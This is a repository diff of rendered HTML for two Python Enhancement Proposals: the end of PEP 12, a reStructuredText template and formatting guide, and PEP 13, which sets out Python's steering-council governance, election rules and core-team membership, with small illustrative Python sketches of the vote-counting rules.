David Goodger <goodger at python.org>, +Barry Warsaw <barry at python.org>, +Brett Cannon <brett at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
05-Aug-2002
+
Post-History:
+
30-Aug-2002
+
+
+
+
+
+

Note

+

For those who have written a PEP before, there is a template +(which is included as a file in the PEPs repository).

+
+
+

Abstract

+

This PEP provides a boilerplate or sample template for creating your +own reStructuredText PEPs. In conjunction with the content guidelines +in PEP 1, this should make it easy for you to conform your own +PEPs to the format outlined below.

+

Note: if you are reading this PEP via the web, you should first grab +the text (reStructuredText) source of this PEP in order to complete +the steps below. DO NOT USE THE HTML FILE AS YOUR TEMPLATE!

+

The source for this (or any) PEP can be found in the +PEPs repository, +as well as via a link at the bottom of each PEP.

+
+
+

Rationale

+

If you intend to submit a PEP, you MUST use this template, in +conjunction with the format guidelines below, to ensure that your PEP +submission won’t get automatically rejected because of form.

+

ReStructuredText provides PEP authors with useful functionality and +expressivity, while maintaining easy readability in the source text. +The processed HTML form makes the functionality accessible to readers: +live hyperlinks, styled text, tables, images, and automatic tables of +contents, among other advantages.

+
+
+

How to Use This Template

+

To use this template you must first decide whether your PEP is going +to be an Informational or Standards Track PEP. Most PEPs are +Standards Track because they propose a new feature for the Python +language or standard library. When in doubt, read PEP 1 for details, +or open a tracker issue on the PEPs repo to ask for assistance.

+

Once you’ve decided which type of PEP yours is going to be, follow the +directions below.

+
    +
  • Make a copy of this file (the .rst file, not the HTML!) and +perform the following edits. Name the new file pep-NNNN.rst, using +the next available number (not used by a published or in-PR PEP).
  • +
  • Replace the “PEP: 12” header with “PEP: NNNN”, +matching the file name. Note that the file name should be padded with +zeros (e.g. pep-0012.rst), but the header should not (PEP: 12).
  • +
  • Change the Title header to the title of your PEP.
  • +
  • Change the Author header to include your name, and optionally your +email address. Be sure to follow the format carefully: your name +must appear first, and it must not be contained in parentheses. +Your email address may appear second (or it can be omitted) and if +it appears, it must appear in angle brackets. It is okay to +obfuscate your email address.
  • +
  • If none of the authors are Python core developers, include a Sponsor +header with the name of the core developer sponsoring your PEP.
  • +
  • Add the direct URL of the PEP’s canonical discussion thread +(on e.g. Python-Dev, Discourse, etc) under the Discussions-To header. +If the thread will be created after the PEP is submitted as an official +draft, it is okay to just list the venue name initially, but remember to +update the PEP with the URL as soon as the PEP is successfully merged +to the PEPs repository and you create the corresponding discussion thread. +See PEP 1 for more details.
  • +
  • Change the Status header to “Draft”.
  • +
  • For Standards Track PEPs, change the Type header to “Standards +Track”.
  • +
  • For Informational PEPs, change the Type header to “Informational”.
  • +
  • For Standards Track PEPs, if your feature depends on the acceptance +of some other currently in-development PEP, add a Requires header +right after the Type header. The value should be the PEP number of +the PEP yours depends on. Don’t add this header if your dependent +feature is described in a Final PEP.
  • +
  • Change the Created header to today’s date. Be sure to follow the +format carefully: it must be in dd-mmm-yyyy format, where the +mmm is the 3 English letter month abbreviation, i.e. one of Jan, +Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec.
  • +
  • For Standards Track PEPs, after the Created header, add a +Python-Version header and set the value to the next planned version +of Python, i.e. the one your new feature will hopefully make its +first appearance in. Do not use an alpha or beta release +designation here. Thus, if the last version of Python was 2.2 alpha +1 and you’re hoping to get your new feature into Python 2.2, set the +header to:
    Python-Version: 2.2
    +
    +
    +
  • +
  • Add a Topic header if the PEP belongs under one shown at the Topic Index. +Most PEPs don’t.
  • +
  • Leave Post-History alone for now; you’ll add dates and corresponding links +to this header each time you post your PEP to the designated discussion forum +(and update the Discussions-To header with said link, as above). +For each thread, use the date (in the dd-mmm-yyyy format) as the +linked text, and insert the URLs inline as anonymous reST hyperlinks, +with commas in between each posting.

    If you posted threads for your PEP on August 14, 2001 and September 3, 2001, +the Post-History header would look like, e.g.:

    +
    Post-History: `14-Aug-2001 <https://www.example.com/thread_1>`__,
    +              `03-Sep-2001 <https://www.example.com/thread_2>`__
    +
    +
    +

    You should add the new dates/links here as soon as you post a +new discussion thread.

    +
  • +
  • Add a Replaces header if your PEP obsoletes an earlier PEP. The +value of this header is the number of the PEP that your new PEP is +replacing. Only add this header if the older PEP is in “final” +form, i.e. is either Accepted, Final, or Rejected. You aren’t +replacing an older open PEP if you’re submitting a competing idea.
  • +
  • Now write your Abstract, Rationale, and other content for your PEP, +replacing all this gobbledygook with your own text. Be sure to +adhere to the format guidelines below, specifically on the +prohibition of tab characters and the indentation requirements. +See “Suggested Sections” below for a template of sections to include.
  • +
  • Update your Footnotes section, listing any footnotes and +non-inline link targets referenced by the text.
  • +
  • Run ./build.py to ensure the PEP is rendered without errors, +and check that the output in build/pep-NNNN.html looks as you intend.
  • +
  • Create a pull request against the PEPs repository.
  • +
+

For reference, here are all of the possible header fields (everything +in brackets should either be replaced or have the field removed if +it has a leading * marking it as optional and it does not apply to +your PEP):

+
PEP: [NNN]
+Title: [...]
+Author: [Full Name <email at example.com>]
+Sponsor: *[Full Name <email at example.com>]
+PEP-Delegate:
+Discussions-To: [URL]
+Status: Draft
+Type: [Standards Track | Informational | Process]
+Topic: *[Governance | Packaging | Release | Typing]
+Requires: *[NNN]
+Created: [DD-MMM-YYYY]
+Python-Version: *[M.N]
+Post-History: [`DD-MMM-YYYY <URL>`__]
+Replaces: *[NNN]
+Superseded-By: *[NNN]
+Resolution:
+
+
+
+
+

ReStructuredText PEP Formatting Requirements

+

The following is a PEP-specific summary of reStructuredText syntax. +For the sake of simplicity and brevity, much detail is omitted. For +more detail, see Resources below. Literal blocks (in which no +markup processing is done) are used for examples throughout, to +illustrate the plaintext markup.

+
+

General

+

Lines should usually not extend past column 79, +excepting URLs and similar circumstances. +Tab characters must never appear in the document at all.

+
+
+

Section Headings

+

PEP headings must begin in column zero and the initial letter of each +word must be capitalized as in book titles. Acronyms should be in all +capitals. Section titles must be adorned with an underline, a single +repeated punctuation character, which begins in column zero and must +extend at least as far as the right edge of the title text (4 +characters minimum). First-level section titles are underlined with +“=” (equals signs), second-level section titles with “-” (hyphens), +and third-level section titles with “’” (single quotes or +apostrophes). For example:

+
First-Level Title
+=================
+
+Second-Level Title
+------------------
+
+Third-Level Title
+'''''''''''''''''
+
+
+

If there are more than three levels of sections in your PEP, you may +insert overline/underline-adorned titles for the first and second +levels as follows:

+
============================
+First-Level Title (optional)
+============================
+
+-----------------------------
+Second-Level Title (optional)
+-----------------------------
+
+Third-Level Title
+=================
+
+Fourth-Level Title
+------------------
+
+Fifth-Level Title
+'''''''''''''''''
+
+
+

You shouldn’t have more than five levels of sections in your PEP. If +you do, you should consider rewriting it.

+

You must use two blank lines between the last line of a section’s body +and the next section heading. If a subsection heading immediately +follows a section heading, a single blank line in-between is +sufficient.

+

The body of each section is not normally indented, although some +constructs do use indentation, as described below. Blank lines are +used to separate constructs.

+
+
+

Paragraphs

+

Paragraphs are left-aligned text blocks separated by blank lines. +Paragraphs are not indented unless they are part of an indented +construct (such as a block quote or a list item).

+
+
+

Inline Markup

+

Portions of text within paragraphs and other text blocks may be +styled. For example:

+
Text may be marked as *emphasized* (single asterisk markup,
+typically shown in italics) or **strongly emphasized** (double
+asterisks, typically boldface).  ``Inline literals`` (using double
+backquotes) are typically rendered in a monospaced typeface.  No
+further markup recognition is done within the double backquotes,
+so they're safe for any kind of code snippets.
+
+
+
+
+

Block Quotes

+

Block quotes consist of indented body elements. For example:

+
This is a paragraph.
+
+    This is a block quote.
+
+    A block quote may contain many paragraphs.
+
+
+

Block quotes are used to quote extended passages from other sources. +Block quotes may be nested inside other body elements. Use 4 spaces +per indent level.

+
+
+

Literal Blocks

+

Literal blocks are used for code samples and other preformatted text. +To indicate a literal block, preface the indented text block with +“::” (two colons), or use the .. code-block:: directive. +Indent the text block by 4 spaces; the literal block continues until the end +of the indentation. For example:

+
This is a typical paragraph.  A literal block follows.
+
+::
+
+    for a in [5, 4, 3, 2, 1]:  # this is program code, shown as-is
+        print(a)
+    print("it's...")
+
+
+

::” is also recognized at the end of any paragraph; if not immediately +preceded by whitespace, one colon will remain visible in the final output:

+
This is an example::
+
+    Literal block
+
+
+

By default, literal blocks will be syntax-highlighted as Python code. +For specific blocks that contain code or data in other languages/formats, +use the .. code-block:: language directive, substituting the “short name” +of the appropriate Pygments lexer +(or text to disable highlighting) for language. For example:

+
.. code-block:: rst
+
+    An example of the ``rst`` lexer (i.e. *reStructuredText*).
+
+
+

For PEPs that predominantly contain literal blocks of a specific language, +use the .. highlight:: language directive with the appropriate language +at the top of the PEP body (below the headers and above the Abstract). +All literal blocks will then be treated as that language, +unless specified otherwise in the specific .. code-block. For example:

+
.. highlight:: c
+
+Abstract
+========
+
+Here's some C code::
+
+    printf("Hello, World!\n");
+
+
+
+
+

Lists

+

Bullet list items begin with one of “-”, “*”, or “+” (hyphen, +asterisk, or plus sign), followed by whitespace and the list item +body. List item bodies must be left-aligned and indented relative to +the bullet; the text immediately after the bullet determines the +indentation. For example:

+
This paragraph is followed by a list.
+
+* This is the first bullet list item.  The blank line above the
+  first list item is required; blank lines between list items
+  (such as below this paragraph) are optional.
+
+* This is the first paragraph in the second item in the list.
+
+  This is the second paragraph in the second item in the list.
+  The blank line above this paragraph is required.  The left edge
+  of this paragraph lines up with the paragraph above, both
+  indented relative to the bullet.
+
+  - This is a sublist.  The bullet lines up with the left edge of
+    the text blocks above.  A sublist is a new list so requires a
+    blank line above and below.
+
+* This is the third item of the main list.
+
+This paragraph is not part of the list.
+
+
+

Enumerated (numbered) list items are similar, but use an enumerator +instead of a bullet. Enumerators are numbers (1, 2, 3, …), letters +(A, B, C, …; uppercase or lowercase), or Roman numerals (i, ii, iii, +iv, …; uppercase or lowercase), formatted with a period suffix +(“1.”, “2.”), parentheses (“(1)”, “(2)”), or a right-parenthesis +suffix (“1)”, “2)”). For example:

+
1. As with bullet list items, the left edge of paragraphs must
+   align.
+
+2. Each list item may contain multiple paragraphs, sublists, etc.
+
+   This is the second paragraph of the second list item.
+
+   a) Enumerated lists may be nested.
+   b) Blank lines may be omitted between list items.
+
+
+

Definition lists are written like this:

+
what
+    Definition lists associate a term with a definition.
+
+how
+    The term is a one-line phrase, and the definition is one
+    or more paragraphs or body elements, indented relative to
+    the term.
+
+
+
+
+

Tables

+

Simple tables are easy and compact:

+
=====  =====  =======
+  A      B    A and B
+=====  =====  =======
+False  False  False
+True   False  False
+False  True   False
+True   True   True
+=====  =====  =======
+
+
+

There must be at least two columns in a table (to differentiate from +section titles). Column spans use underlines of hyphens (“Inputs” +spans the first two columns):

+
=====  =====  ======
+   Inputs     Output
+------------  ------
+  A      B    A or B
+=====  =====  ======
+False  False  False
+True   False  True
+False  True   True
+True   True   True
+=====  =====  ======
+
+
+

Text in a first-column cell starts a new row. No text in the first +column indicates a continuation line; the rest of the cells may +consist of multiple lines. For example:

+
=====  =========================
+col 1  col 2
+=====  =========================
+1      Second column of row 1.
+2      Second column of row 2.
+       Second line of paragraph.
+3      - Second column of row 3.
+
+       - Second item in bullet
+         list (row 3, column 2).
+=====  =========================
+
+
+
+ + +
+

Footnotes

+

Footnote references consist of a left square bracket, a label, a +right square bracket, and a trailing underscore. +Instead of a number, use a label of the +form “#word”, where “word” is a mnemonic consisting of alphanumerics +plus internal hyphens, underscores, and periods (no whitespace or +other characters are allowed). +For example:

+
Refer to The TeXbook [#TeXbook]_ for more information.
+
+
+

which renders as

+
+
Refer to The TeXbook [1] for more information.
+

Whitespace must precede the footnote reference. Leave a space between +the footnote reference and the preceding word.

+

Use footnotes for additional notes, explanations and caveats, as well as +for references to books and other sources not readily available online. +Native reST hyperlink targets or inline hyperlinks in the text should be +used in preference to footnotes for including URLs to online resources.

+

Footnotes begin with “.. “ (the explicit +markup start), followed by the footnote marker (no underscores), +followed by the footnote body. For example:

+
.. [#TeXbook] Donald Knuth's *The TeXbook*, pages 195 and 196.
+
+
+

which renders as

+
[1] Donald Knuth’s The TeXbook, pages 195 and 196.
+
+

Footnotes and footnote references will be numbered automatically, and +the numbers will always match.

+
+
+

Images

+

If your PEP contains a diagram or other graphic, you may include it in the +processed output using the image directive:

+
.. image:: diagram.png
+
+
+

Any browser-friendly graphics format is possible; PNG should be +preferred for graphics, JPEG for photos and GIF for animations. +Currently, SVG must be avoided due to compatibility issues with the +PEP build system.

+

For accessibility and readers of the source text, you should include +a description of the image and any key information contained within +using the :alt: option to the image directive:

+
.. image:: dataflow.png
+   :alt: Data flows from the input module, through the "black box"
+         module, and finally into (and through) the output module.
+
+
+
+
+

Comments

+

A comment is an indented block of arbitrary text immediately +following an explicit markup start: two periods and whitespace. Leave +the “..” on a line by itself to ensure that the comment is not +misinterpreted as another explicit markup construct. Comments are not +visible in the processed document. For example:

+
..
+   This section should be updated in the final PEP.
+   Ensure the date is accurate.
+
+
+
+
+

Escaping Mechanism

+

reStructuredText uses backslashes (”\”) to override the special +meaning given to markup characters and get the literal characters +themselves. To get a literal backslash, use an escaped backslash +(”\\”). There are two contexts in which backslashes have no +special meaning: literal blocks and inline literals (see Inline +Markup above). In these contexts, no markup recognition is done, +and a single backslash represents a literal backslash, without having +to double up.

+

If you find that you need to use a backslash in your text, consider +using inline literals or a literal block instead.

+
+
+

Intersphinx

+

You can use +Intersphinx references +to other Sphinx sites, +such as the Python documentation, +packaging.python.org, +and typing.readthedocs.io, +to easily cross-reference pages, sections and Python/C objects.

+

For example, +to create a link pointing to a section of the typing docs, +you would write the following:

+
:ref:`type expression <typing:type-expression>`
+
+
+
+
+

Canonical Documentation

+

As PEP 1 describes, +PEPs are considered historical documents once marked Final, +and their canonical documentation/specification should be moved elsewhere. +To indicate this, use the canonical-doc directive +or an appropriate subclass:

+
    +
  • canonical-pypa-spec for packaging standards
  • +
  • canonical-typing-spec for typing standards
  • +
+

Add the directive between the headers and the first section of the PEP +(typically the Abstract) +and pass as an argument an Intersphinx reference of the canonical doc/spec +(or if the target is not on a Sphinx site, a reST hyperlink).

+

For example, +to create a banner pointing to the sqlite3 docs, +you would write the following:

+
.. canonical-doc:: :mod:`python:sqlite3`
+
+
+

which would generate the banner:

+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at sqlite3.

+


+

See PEP 1 for how to propose changes.

+
+
+

Or for a PyPA spec, +such as the Core metadata specifications, +you would use:

+
.. canonical-pypa-spec:: :ref:`packaging:core-metadata`
+
+
+

which renders as:

+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

For a typing PEP that introduces no new runtime objects, +you might use something like the first one of these; +for a typing PEP that introduces a new object to the typing module at runtime, +you might use the second:

+
.. canonical-typing-spec:: :ref:`typing:packaging-typed-libraries`
+.. canonical-typing-spec:: :ref:`typing:literal-types` and
+                           :py:data:`typing.Literal`
+
+
+

The two render as:

+
+
+

Attention

+

This PEP is a historical document: see Type information in libraries for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Attention

+

This PEP is a historical document: see Literals and +typing.Literal for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

The argument accepts arbitrary reST, +so you can include multiple linked docs/specs and name them whatever you like, +and you can also include directive content that will be inserted into the text. +The following advanced example:

+
.. canonical-doc:: the :ref:`python:sqlite3-connection-objects` and :exc:`python:~sqlite3.DataError` docs
+
+    Also, see the :ref:`Data Persistence docs <persistence>` for other examples.
+
+
+

would render as:

+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at the Connection objects and sqlite3.DataError docs.

+


+

Also, see the Data Persistence docs for other examples.

+

See PEP 1 for how to propose changes.

+
+
+
+
+
+

Habits to Avoid

+

Many programmers who are familiar with TeX often write quotation marks +like this:

+
`single-quoted' or ``double-quoted''
+
+
+

Backquotes are significant in reStructuredText, so this practice +should be avoided. For ordinary text, use ordinary ‘single-quotes’ or +“double-quotes”. For inline literal text (see Inline Markup +above), use double-backquotes:

+
``literal text: in here, anything goes!``
+
+
+
+
+

Suggested Sections

+

Various sections are found to be common across PEPs and are outlined in +PEP 1. Those sections are provided here for convenience.

+
PEP: <REQUIRED: pep number>
+Title: <REQUIRED: pep title>
+Author: <REQUIRED: list of authors' names and optionally, email addrs>
+Sponsor: <name of sponsor>
+PEP-Delegate: <PEP delegate's name>
+Discussions-To: <REQUIRED: URL of current canonical discussion thread>
+Status: <REQUIRED: Draft | Active | Accepted | Provisional | Deferred | Rejected | Withdrawn | Final | Superseded>
+Type: <REQUIRED: Standards Track | Informational | Process>
+Topic: <Governance | Packaging | Release | Typing>
+Requires: <pep numbers>
+Created: <date created on, in dd-mmm-yyyy format>
+Python-Version: <version number>
+Post-History: <REQUIRED: dates, in dd-mmm-yyyy format, and corresponding links to PEP discussion threads>
+Replaces: <pep number>
+Superseded-By: <pep number>
+Resolution: <url>
+
+
+Abstract
+========
+
+[A short (~200 word) description of the technical issue being addressed.]
+
+
+Motivation
+==========
+
+[Clearly explain why the existing language specification is inadequate to address the problem that the PEP solves.]
+
+
+Rationale
+=========
+
+[Describe why particular design decisions were made.]
+
+
+Specification
+=============
+
+[Describe the syntax and semantics of any new language feature.]
+
+
+Backwards Compatibility
+=======================
+
+[Describe potential impact and severity on pre-existing code.]
+
+
+Security Implications
+=====================
+
+[How could a malicious user take advantage of this new feature?]
+
+
+How to Teach This
+=================
+
+[How to teach users, new and experienced, how to apply the PEP to their work.]
+
+
+Reference Implementation
+========================
+
+[Link to any existing implementation and details about its state, e.g. proof-of-concept.]
+
+
+Rejected Ideas
+==============
+
+[Why certain ideas that were brought while discussing this PEP were not ultimately pursued.]
+
+
+Open Issues
+===========
+
+[Any points that are still being decided/discussed.]
+
+
+Footnotes
+=========
+
+[A collection of footnotes cited in the PEP, and a place to list non-inline hyperlink targets.]
+
+
+Copyright
+=========
+
+This document is placed in the public domain or under the
+CC0-1.0-Universal license, whichever is more permissive.
+
+
+
+
+

Resources

+

Many other constructs and variations are possible, +both those supported by basic Docutils +and the extensions added by Sphinx.

+

A number of resources are available to learn more about them:

+ +

If you have questions or require assistance with writing a PEP that the above +resources don’t address, ping @python/pep-editors on GitHub, open an +issue on the PEPs repository, or reach out to a PEP editor directly.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0012.rst

+

Last modified: 2024-06-14 23:31:40 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0013/index.html b/pep-0013/index.html new file mode 100644 index 00000000000..b977e1c620f --- /dev/null +++ b/pep-0013/index.html @@ -0,0 +1,491 @@ PEP 13 – Python Language Governance | peps.python.org
+
+

+
+
+

PEP 13 – Python Language Governance

+
+
Author:
+
The Python core team and community
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
16-Dec-2018
+
+
+
+
+
+

Abstract

+

This PEP defines the formal governance process for Python, and records +how this has changed over time. Currently, governance is based around +a steering council. The council has broad authority, which they seek +to exercise as rarely as possible.

+
+
+

Current steering council

+

The 2025 term steering council consists of:

+
    +
  • Barry Warsaw
  • +
  • Donghee Na
  • +
  • Emily Morehouse
  • +
  • Gregory P. Smith
  • +
  • Pablo Galindo Salgado
  • +
+

Per the results of the vote tracked in PEP 8106.

+

The core team consists of those listed in the private +https://github.com/python/voters/ repository which is publicly +shared via https://devguide.python.org/developers/.

+
+
+

Specification

+
+

The steering council

+
+

Composition

+

The steering council is a 5-person committee.

+
+
+

Mandate

+

The steering council shall work to:

+
    +
  • Maintain the quality and stability of the Python language and +CPython interpreter,
  • +
  • Make contributing as accessible, inclusive, and sustainable as +possible,
  • +
  • Formalize and maintain the relationship between the core team and +the PSF,
  • +
  • Establish appropriate decision-making processes for PEPs,
  • +
  • Seek consensus among contributors and the core team before acting in +a formal capacity,
  • +
  • Act as a “court of final appeal” for decisions where all other +methods have failed.
  • +
+
+
+

Powers

+

The council has broad authority to make decisions about the project. +For example, they can:

+
    +
  • Accept or reject PEPs
  • +
  • Enforce or update the project’s code of conduct
  • +
  • Work with the PSF to manage any project assets
  • +
  • Delegate parts of their authority to other subcommittees or +processes
  • +
+

However, they cannot modify this PEP, or affect the membership of the +core team, except via the mechanisms specified in this PEP.

+

The council should look for ways to use these powers as little as +possible. Instead of voting, it’s better to seek consensus. Instead of +ruling on individual PEPs, it’s better to define a standard process +for PEP decision making (for example, by accepting one of the other +801x series of PEPs). It’s better to establish a Code of Conduct +committee than to rule on individual cases. And so on.

+

To use its powers, the council votes. Every council member must either +vote or explicitly abstain. Members with conflicts of interest on a +particular vote must abstain. Passing requires a strict majority of +non-abstaining council members.
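To make the counting rules concrete, here is a minimal Python sketch of the vote arithmetic (the function names and vote encoding are illustrative assumptions, not anything defined by this PEP). It also covers the stricter two-thirds threshold used later for ejecting core team members:

from fractions import Fraction

def strict_majority(in_favor, against):
    # Ordinary council vote: abstentions are excluded from the
    # denominator, and passing needs strictly more than half of
    # the non-abstaining members, so a tie fails.
    voting = in_favor + against
    return voting > 0 and Fraction(in_favor, voting) > Fraction(1, 2)

def at_least_two_thirds(in_favor, against):
    # Stricter rule used below for ejecting core team members:
    # at least a two-thirds majority of those voting.
    voting = in_favor + against
    return voting > 0 and Fraction(in_favor, voting) >= Fraction(2, 3)

# With all 5 members voting: 3:2 passes an ordinary vote but is
# insufficient for ejection; 4:1 satisfies both thresholds.
assert strict_majority(3, 2) and not at_least_two_thirds(3, 2)
assert at_least_two_thirds(4, 1)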

+

Whenever possible, the council’s deliberations and votes shall be held +in public.

+
+
+

Electing the council

+

A council election consists of two phases:

+
    +
  • Phase 1: Candidates advertise their interest in serving. Candidates +must be nominated by a core team member. Self-nominations are +allowed.
  • +
  • Phase 2: Each core team member can assign zero to five stars to each +candidate. Voting is performed anonymously. The outcome of the vote +is determined using the STAR voting system, +modified to use the Multi-winner Bloc STAR +approach (a minimal tallying sketch follows this list). If a tie occurs, it may +be resolved by mutual agreement among the candidates, or else the +winner will be chosen at random.
  • +
+
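As referenced in Phase 2 above, the following is a minimal, illustrative Python sketch of STAR tallying under simplifying assumptions (ballots as candidate-to-stars mappings; tie-breaking omitted, since the PEP resolves ties by agreement or at random). It is not the project’s actual election tooling:

def star_winner(ballots, candidates):
    # Scoring round: the two candidates with the highest star
    # totals advance.  Automatic runoff: whichever finalist is
    # scored higher on more ballots wins.
    if len(candidates) == 1:
        return candidates[0]
    totals = {c: sum(b.get(c, 0) for b in ballots) for c in candidates}
    a, b = sorted(candidates, key=totals.get, reverse=True)[:2]
    prefer_a = sum(1 for bal in ballots if bal.get(a, 0) > bal.get(b, 0))
    prefer_b = sum(1 for bal in ballots if bal.get(b, 0) > bal.get(a, 0))
    return a if prefer_a >= prefer_b else b

def bloc_star(ballots, candidates, seats=5):
    # Multi-winner Bloc STAR: run STAR repeatedly, removing each
    # winner from the pool, until all seats are filled.
    remaining, winners = list(candidates), []
    while remaining and len(winners) < seats:
        winner = star_winner(ballots, remaining)
        winners.append(winner)
        remaining.remove(winner)
    return winners

ballots = [{"A": 5, "B": 3, "C": 0},
           {"A": 2, "B": 4, "C": 1},
           {"A": 0, "B": 5, "C": 4}]
print(star_winner(ballots, ["A", "B", "C"]))  # -> B (highest star total,
                                              # and preferred to A in the runoff)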

Each phase lasts one to two weeks, at the outgoing council’s discretion. +For the initial election, both phases will last two weeks.

+

The election process is managed by a returns officer nominated by the +outgoing steering council. For the initial election, the returns +officer will be nominated by the PSF Executive Director.

+

The council should ideally reflect the diversity of Python +contributors and users, and core team members are encouraged to vote +accordingly.

+
+
+

Term

+

A new council is elected after each feature release. Each council’s +term runs from when their election results are finalized until the +next council’s term starts. There are no term limits.

+
+
+

Vacancies

+

Council members may resign their position at any time.

+

Whenever there is a vacancy during the regular council term, the +council may vote to appoint a replacement to serve out the rest of the +term.

+

If a council member drops out of touch and cannot be contacted for a +month or longer, then the rest of the council may vote to replace +them.

+
+
+

Conflicts of interest

+

While we trust council members to act in the best interests of Python +rather than themselves or their employers, the mere appearance of any +one company dominating Python development could itself be harmful and +erode trust. In order to avoid any appearance of conflict of interest, +at most 2 members of the council can work for any single employer.

+

In a council election, if 3 of the top 5 vote-getters work for the +same employer, then whichever of them ranked lowest is disqualified +and the 6th-ranking candidate moves up into 5th place; this is +repeated until a valid council is formed.
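The disqualification pass described above is mechanical enough to express directly. A minimal sketch, assuming candidates arrive as a ranked list with a separate employer mapping (both data shapes are hypothetical, not project tooling):

def apply_employer_cap(ranked, employer, cap=2, seats=5):
    # Walk candidates best-ranked first, seating each one unless
    # doing so would give a single employer more than `cap` seats;
    # a skipped candidate is the "lowest-ranked of the three" case
    # above, and the next-ranked candidate simply moves up.
    seated, per_employer = [], {}
    for candidate in ranked:
        emp = employer[candidate]
        if per_employer.get(emp, 0) >= cap:
            continue  # disqualified: employer already holds `cap` seats
        seated.append(candidate)
        per_employer[emp] = per_employer.get(emp, 0) + 1
        if len(seated) == seats:
            break
    return seated

ranked = ["ann", "bob", "cat", "dan", "eve", "fay"]
employer = {"ann": "X", "bob": "X", "cat": "X",
            "dan": "Y", "eve": "Z", "fay": "W"}
print(apply_employer_cap(ranked, employer))
# -> ['ann', 'bob', 'dan', 'eve', 'fay']: "cat" (the lowest-ranked of
# three X employees in the top 5) is dropped and "fay" moves up.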

+

During a council term, if changing circumstances cause this rule to be +broken (for instance, due to a council member changing employment), +then one or more council members must resign to remedy the issue, and +the resulting vacancies can then be filled as normal.

+
+
+

Ejecting core team members

+

In exceptional circumstances, it may be necessary to remove someone +from the core team against their will. (For example: egregious and +ongoing code of conduct violations.) This can be accomplished by a +steering council vote, but unlike other steering council votes, this +requires at least a two-thirds majority. With 5 members voting, this +means that a 3:2 vote is insufficient; 4:1 in favor is the minimum +required for such a vote to succeed. In addition, this is the one +power of the steering council which cannot be delegated, and this +power cannot be used while a vote of no confidence is in process.

+

If the ejected core team member is also on the steering council, then +they are removed from the steering council as well.

+
+
+

Vote of no confidence

+

In exceptional circumstances, the core team may remove a sitting +council member, or the entire council, via a vote of no confidence.

+

A no-confidence vote is triggered when a core team member calls for +one publicly on an appropriate project communication channel, and +another core team member seconds the proposal within one week.

+

The vote lasts for two weeks. Core team members vote for or against. +If at least two thirds of voters express a lack of confidence, then +the vote succeeds.

+

There are two forms of no-confidence votes: those targeting a single +member, and those targeting the council as a whole. The initial call +for a no-confidence vote must specify which type is intended. If a +single-member vote succeeds, then that member is removed from the +council and the resulting vacancy can be handled in the usual way. If +a whole-council vote succeeds, the council is dissolved and a new +council election is triggered immediately.

+
+
+
+

The core team

+
+

Role

+

The core team is the group of trusted volunteers who manage Python. +They assume many roles required to achieve the project’s goals, +especially those that require a high level of trust. They make the +decisions that shape the future of the project.

+

Core team members are expected to act as role models for the community +and custodians of the project, on behalf of the community and all +those who rely on Python.

+

They will intervene, where necessary, in online discussions or at +official Python events on the rare occasions that a situation arises +that requires intervention.

+

They have authority over the Python Project infrastructure, including +the Python Project website itself, the Python GitHub organization and +repositories, the bug tracker, the mailing lists, IRC channels, etc.

+
+
+

Prerogatives

+

Core team members may participate in formal votes, typically to nominate new +team members and to elect the steering council.

+
+
+

Membership

+

Python core team members demonstrate:

+
    +
  • a good grasp of the philosophy of the Python Project
  • +
  • a solid track record of being constructive and helpful
  • +
  • significant contributions to the project’s goals, in any form
  • +
  • willingness to dedicate some time to improving Python
  • +
+

As the project matures, contributions go beyond code. Here’s an +incomplete list of areas where contributions may be considered for +joining the core team, in no particular order:

+
    +
  • Working on community management and outreach
  • +
  • Providing support on the mailing lists and on IRC
  • +
  • Triaging tickets
  • +
  • Writing patches (code, docs, or tests)
  • +
  • Reviewing patches (code, docs, or tests)
  • +
  • Participating in design decisions
  • +
  • Providing expertise in a particular domain (security, i18n, etc.)
  • +
  • Managing the continuous integration infrastructure
  • +
  • Managing the servers (website, tracker, documentation, etc.)
  • +
  • Maintaining related projects (alternative interpreters, core +infrastructure like packaging, etc.)
  • +
  • Creating visual designs
  • +
+

Core team membership acknowledges sustained and valuable efforts that +align well with the philosophy and the goals of the Python project.

+

It is granted by receiving at least two-thirds positive votes in a +core team vote that is open for one week and is not vetoed by the +steering council.

+
+

Note

+

The devguide has a suggested template +to use for such votes.

+
+

Core team members are always looking for promising contributors, +teaching them how the project is managed, and submitting their names +to the core team’s vote when they’re ready.

+

There’s no time limit on core team membership. However, in order to +provide the general public with a reasonable idea of how many people +maintain Python, core team members who have stopped contributing are +encouraged to declare themselves as “inactive”. Those who haven’t made +any non-trivial contribution in two years may be asked to move +themselves to this category, and moved there if they don’t respond. To +record and honor their contributions, inactive team members will +continue to be listed alongside active core team members; and, if they +later resume contributing, they can switch back to active status at +will. While someone is in inactive status, though, they lose their +active privileges like voting or nominating for the steering council, +and commit access.

+

The initial active core team members will consist of everyone +currently listed in the “Python core” team on GitHub (access +granted for core members only), and the +initial inactive members will consist of everyone else who has been a +committer in the past.

+
+
+
+

Changing this document

+

Changes to this document require at least a two-thirds majority of +votes cast in a core team vote which should be open for two weeks.

+

No vote is required to update note blocks and the “Current steering +council” and “History of council elections” sections with current +information.

+
+
+
+

History

+
+

Creation of this document

+

The Python project was started by Guido van Rossum, who served as its +Benevolent Dictator for Life (BDFL) from inception until July 2018, +when he stepped down.

+

After discussion, a number of proposals were put forward for a new +governance model, and the core devs voted to choose between them. The +overall process is described in PEP 8000 and PEP 8001, a review of +other projects was performed in PEP 8002, and the proposals themselves +were written up as the 801x series of PEPs. Eventually the proposal in +PEP 8016 was selected +as the new governance model, and was used to create the initial +version of this PEP. The 8000-series PEPs are preserved for historical +reference (and in particular, PEP 8016 contains additional rationale +and links to contemporary discussions), but this PEP is now the +official reference, and will evolve following the rules described +herein.

+
